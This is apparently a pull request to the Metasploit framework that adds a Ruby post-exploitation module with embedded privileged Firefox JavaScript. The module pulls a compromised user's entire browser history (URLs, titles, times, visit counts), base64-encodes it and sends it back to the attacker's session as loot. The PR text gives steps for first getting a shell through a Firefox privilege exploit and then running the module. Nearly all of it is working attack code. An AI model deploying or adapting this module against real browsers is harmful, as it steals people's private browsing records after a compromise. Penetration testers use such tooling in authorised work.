### PR TITLE
Adds history collection module for FF privileged JS

### DIFF
--- a/modules/post/firefox/gather/history.rb
+++ b/modules/post/firefox/gather/history.rb
@@ -1,0 +1,90 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'json'
+require 'msf/core'
+require 'msf/core/payload/firefox'
+
+class Metasploit3 < Msf::Post
+
+  include Msf::Payload::Firefox
+  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'          => 'Firefox Gather History from Privileged Javascript Shell',
+      'Description'   => %q{
+        This module allows collection of the entire browser history from a Firefox
+        Privileged Javascript Shell.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        => [ 'joev' ],
+      'DisclosureDate' => 'Apr 11 2014'
+    ))
+
+    register_options([
+      OptInt.new('TIMEOUT', [true, "Maximum time (seconds) to wait for a response", 90])
+    ], self.class)
+  end
+
+  def run
+    print_status "Running the privileged javascript..."
+    session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]")
+    results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT'])
+    if results.present?
+      begin
+        history = JSON.parse(results)
+        history.each do |entry|
+          entry.keys.each { |k| entry[k] = Rex::Text.decode_base64(entry[k]) }
+        end
+
+        file = store_loot("firefox.history.json", "text/json", rhost, history.to_json)
+        print_good("Saved #{history.length} history entries to #{file}")
+      rescue JSON::ParserError => e
+        print_warning(results)
+      end
+    end
+  end
+
+  def js_payload
+    %Q|
+      (function(send){
+        try {
+          var service = Components
+                .classes["@mozilla.org/browser/nav-history-service;1"]
+                .getService(Components.interfaces.nsINavHistoryService);
+          var b64 = Components.utils.import("resource://gre/modules/Services.jsm").btoa;
+
+          var query = service.getNewQuery();
+          var options = service.getNewQueryOptions();
+          var result = service.executeQuery(query, options);
+          var fields = [];
+          var entries = [];
+
+          var root = result.root;
+          root.containerOpen = true;
+
+          for (var i = 0; i < result.root.childCount; ++i) {
+            var child = result.root.getChild(i);
+            if (child.type == child.RESULT_TYPE_URI) {
+              entries.push({
+                uri: b64(child.uri),
+                title: b64(child.title),
+                time: b64(child.time),
+                accessCount: b64(child.accessCount)
+              });
+            }
+          }
+
+          result.root.containerOpen = false;
+
+          send(JSON.stringify(entries));
+        } catch (e) {
+          send(e);
+        }
+      })(send);
+    |.strip
+  end
+end


### PR DESCRIPTION
Third try is a charm. I made sure I actually pushed the right code this time :)

Verification
- [x] get a shell through a firefox javascript privilege exploit, like `exploit/multi/browser/firefox_proto_crmfrequest`, using `set TARGET 0` to use a js shell
- [x] `use post/firefox/gather/history`, run it against the above session
- [x] you should get a json file containing all the history currently  saved in firefox
